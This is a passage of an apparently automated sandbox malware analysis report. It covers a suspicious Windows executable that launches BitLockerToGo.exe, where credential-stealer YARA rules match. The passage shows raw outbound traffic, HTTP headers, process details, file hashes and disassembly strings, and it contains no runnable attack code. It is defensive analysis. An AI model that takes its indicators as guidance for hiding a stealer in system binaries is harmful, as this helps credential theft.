                                                                                                                    2024-12-26 11:01:40 UTC15331OUTData Raw: 46 10 7a 9e 1b fc 9e c8 a6 58 3a 67 34 dc 69 62 38 05 24 d0 c9 77 b1 9c 8f 5d 49 da 87 13 b7 02 01 9f 4f ba 69 fa 2f 6d 0f b5 b0 26 76 7e dd 4a 67 3e 33 36 4d 67 45 a4 57 cf f4 3e d8 fe 5d f6 28 fd fa 6c 77 ab e6 1a 93 86 4f e4 f7 ac 01 ac 3d f6 f5 d2 b1 41 6f d9 75 d2 b7 1a 07 12 66 b7 3c 7d 41 c0 9d ed 5b a1 52 29 f0 2c 27 c3 b1 73 b4 65 74 fc 44 97 32 2f 96 b0 07 f3 83 40 c0 09 3e 50 33 71 08 81 d0 63 ab 94 68 95 82 ed 6f d7 78 f7 33 d4 fb b6 bc 21 3d ff f8 2d b0 9f 21 0a 20 08 d0 34 f7 01 4d 1b 39 e2 09 e5 06 f5 0e ee 8c a2 c0 95 ab 6b ab 7f bc 2a 0e f7 07 d4 eb 2e 7c 7a 30 bb 78 ab b3 74 bb 08 fd ef 70 b7 78 8b 67 3e 5c a0 f7 58 cd 5b 9a 4e 03 c1 fb 03 44 7f 1f fd ef ac b9 6a 50 f0 ee e6 75 d0 75 3b 10 82 5f 44 f9 be 66 0d 43 c0 45 b2 e0 9c dd 7c a7
                                                                                                                    Data Ascii: FzX:g4ib8$w]IOi/m&v~Jg>36MgEW>](lwO=Aouf<}A[R),'setD2/@>P3qchox3!=-! 4M9k*.|z0xtpxg>\X[NDjPuu;_DfCE|
                                                                                                                    2024-12-26 11:01:43 UTC1135INHTTP/1.1 200 OK
                                                                                                                    Date: Thu, 26 Dec 2024 11:01:43 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=j96uap2odtftees1qk699a72bg; expires=Mon, 21 Apr 2025 04:48:21 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9IMXls0vZgC%2FbqnaQUodRP7uG471CpGvzZR5jwDtRc%2Fo9B37qyi4A5YLxF1LJmdko%2FyPhaRkx8R7l%2FO%2BkuqNIEOYB82XWopTDip0KtLJSlbtfk4aJzW2NJ8XoD92ez7uGn%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f80930249b041bd-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1640&rtt_var=635&sent=383&recv=602&lost=0&retrans=0&sent_bytes=2840&recv_bytes=575963&delivery_rate=1780487&cwnd=249&unsent_bytes=0&cid=ecb5c75c40aa186f&ts=2659&x=0"


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:06:01:00
                                                                                                                    Start date:26/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\MPySEh8HaF.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\MPySEh8HaF.exe"
                                                                                                                    Imagebase:0xff0000
                                                                                                                    File size:7'409'664 bytes
                                                                                                                    MD5 hash:58CFFD92455EEC9CD613EDE591ED6C2C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:06:01:20
                                                                                                                    Start date:26/12/2024
                                                                                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                    Imagebase:0x970000
                                                                                                                    File size:231'736 bytes
                                                                                                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Non-executed Functions

                                                                                                                      Function 01023530 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • %, xrefs: 01023854
                                                                                                                      • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 01023817
                                                                                                                      • bad g0 stackbad recoveryca-central-1caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallescaped chareu-central-1exit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddecommithost is , xrefs: 0102373A
                                                                                                                      • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function s3.dualstack.ap-south-1.amazonaws.coms3.dualstack.eu-north-1.amazonaws.comsetprofilebucket: profile already setstartTheWorld: inconsistent mp->nextps, xrefs: 0102384B
                                                                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePointWait != 0frame_settings_window_, xrefs: 01023795
                                                                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 01023761
                                                                                                                      • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait , xrefs: 010236CB
                                                                                                                      • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunexpected trailing char found. Exp, xrefs: 010237BC
                                                                                                                      • CreateWaitableTimerEx when creating timer failedYou must provide the Content-Length HTTP header.bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate , xrefs: 010237F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1898991738.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1898974889.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.000000000131A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.0000000001419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899541418.000000000161C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899560216.0000000001625000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899578012.0000000001626000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899594168.0000000001627000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899650420.00000000016BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899668510.00000000016BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016E9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899776570.00000000016F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899793279.00000000016F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899793279.0000000001715000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_ff0000_MPySEh8HaF.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function s3.dualstack.ap-south-1.amazonaws.coms3.dualstack.eu-north-1.amazonaws.comsetprofilebucket: profile already setstartTheWorld: inconsistent mp->nextps$%$CreateWaitableTimerEx when creating timer failedYou must provide the Content-Length HTTP header.bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate $VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryforEachP: sched.safePointWait != 0frame_settings_window_$bad g0 stackbad recoveryca-central-1caller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallescaped chareu-central-1exit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddecommithost is $runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=transform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another goroutineunexpected trailing char found. Exp$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftservice unavailableskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected g statusunknown Go type: %vunknown certificateunknown hash value unknown wait
                                                                                                                      • API String ID: 0-2060340962
                                                                                                                      • Opcode ID: 3562154d446e92735e14f48931790a625ae4fc1fdd28136b74e0c199e1b45b10
                                                                                                                      • Instruction ID: 3da853e3e6b74ce1329fb3f0f614ddbdec93df023baa6fcc11d887dbb95fbed6
                                                                                                                      • Opcode Fuzzy Hash: 3562154d446e92735e14f48931790a625ae4fc1fdd28136b74e0c199e1b45b10
                                                                                                                      • Instruction Fuzzy Hash: 2381D2B45093128FD350EF68C19879ABBE4BF98704F05892EE8C88B350EB79D945CF52
                                                                                                                      Function 010335C0 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp%!(BADPREC)) at entry+* [CONTEXT], elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s, xrefs: 010336C7
                                                                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 01033711
                                                                                                                      • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestruct fieldsweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (defa, xrefs: 01033659
                                                                                                                      • m->p= max= min= next= p->m= prev= span=!!bool!!null% util%s[%dm' for (...), i = , not , val .local.onion.reloc390625<-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveExpectExportFlags=FormatFr, xrefs: 0103367B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1898991738.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1898974889.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.000000000131A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899306886.0000000001419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899541418.000000000161C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899560216.0000000001625000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899578012.0000000001626000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899594168.0000000001627000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899650420.00000000016BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899668510.00000000016BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016E9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899685753.00000000016ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899776570.00000000016F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899793279.00000000016F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1899793279.0000000001715000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_ff0000_MPySEh8HaF.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m->p= max= min= next= p->m= prev= span=!!bool!!null% util%s[%dm' for (...), i = , not , val .local.onion.reloc390625<-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveExpectExportFlags=FormatFr$ p->status= s.nelems= schedtick= span.list= timerslen=!!timestamp%!(BADPREC)) at entry+* [CONTEXT], elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestruct fieldsweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (defa
                                                                                                                      • API String ID: 0-2036700675
                                                                                                                      • Opcode ID: c6e0ae2aff1a2fa4c7c579b3995fb687ae5e7e0b23d7d3bbda8b557ad49943da
                                                                                                                      • Instruction ID: 1dd7287b172005035c407196aa08876714e33046abf910d0ff3a2285ad36baa5
                                                                                                                      • Opcode Fuzzy Hash: c6e0ae2aff1a2fa4c7c579b3995fb687ae5e7e0b23d7d3bbda8b557ad49943da
                                                                                                                      • Instruction Fuzzy Hash: 2031D2B8509316CFD310EF24C19479ABBE4BF98754F05896EE8C88B341D735D884DBA2